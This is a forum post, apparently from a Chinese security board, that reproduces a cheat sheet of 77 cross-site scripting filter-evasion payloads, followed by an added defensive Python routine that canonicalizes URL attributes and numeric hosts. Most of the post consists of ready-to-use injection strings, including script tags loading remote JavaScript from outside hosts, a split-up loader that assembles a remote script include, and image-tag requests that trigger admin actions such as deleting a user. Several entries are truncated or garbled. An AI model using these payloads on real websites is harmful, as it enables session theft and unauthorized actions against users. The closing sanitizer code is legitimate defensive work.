XSS Attack Roundup

Posted on 2013-4-19 19:22:37
There seems to be fairly little XSS material on t00ls, so I saw some good stuff and copied it over; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multiline JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
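Most of the IMG/A/LINK vectors above disguise the same javascript: scheme with case changes, tabs, newlines, NULs or entity encoding, and items 70 to 76 write one host several ways. The following defender-side example is added here and is not part of the original post or the cheat sheet it copies: it canonicalizes an href/src value the way a browser does before checking the scheme against an allowlist, and rewrites numeric hosts to a dotted quad so they can be compared against a host list. The function names are my own and the inputs are constructed.

```python
import html
import ipaddress
import re
from urllib.parse import urlsplit

# Schemes accepted in href/src values; "" covers relative and //host URLs.
ALLOWED_SCHEMES = {"", "http", "https", "mailto"}
C0_AND_SPACE = "".join(map(chr, range(0x21)))  # U+0000 .. U+0020

def canonical_attr_value(raw: str) -> str:
    """Undo what a browser undoes before it reads the scheme: decode entities
    (with or without semicolons), drop NUL/tab/CR/LF anywhere, then trim
    leading and trailing control characters and spaces."""
    decoded = re.sub(r"[\x00\t\n\r]", "", html.unescape(raw))
    return decoded.strip(C0_AND_SPACE)

def scheme_allowed(raw: str) -> bool:
    """True only when the canonical value's scheme is on the allowlist."""
    try:
        scheme = urlsplit(canonical_attr_value(raw)).scheme
    except ValueError:
        return False
    return scheme.lower() in ALLOWED_SCHEMES

def _c_int(part: str) -> int:
    """inet_aton-style component: 0x.. is hex, a leading 0 is octal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)

def canonical_host(raw: str) -> str:
    """Lowercase host without a trailing dot; decimal, hex, octal or short
    dotted numeric hosts are rewritten as a plain dotted quad."""
    host = (urlsplit(canonical_attr_value(raw)).hostname or "").rstrip(".")
    try:
        nums = [_c_int(p) for p in host.split(".")]
    except ValueError:
        return host  # not numeric: an ordinary DNS name
    if not 1 <= len(nums) <= 4:
        return host
    tail_bits = 8 * (5 - len(nums))  # the last part fills the remaining bytes
    if not (all(0 <= n <= 255 for n in nums[:-1]) and 0 <= nums[-1] < 1 << tail_bits):
        return host
    value = 0
    for n in nums[:-1]:  # every leading part is exactly one byte
        value = (value << 8) | n
    return str(ipaddress.IPv4Address((value << tail_bits) | nums[-1]))
```

A literal substring match on "javascript:" misses the case, tab, NUL and entity variants above; checking the scheme only after canonicalization catches all of them with one rule. The decimal, hex and octal hosts of items 70 to 72 all canonicalize to 192.168.0.1.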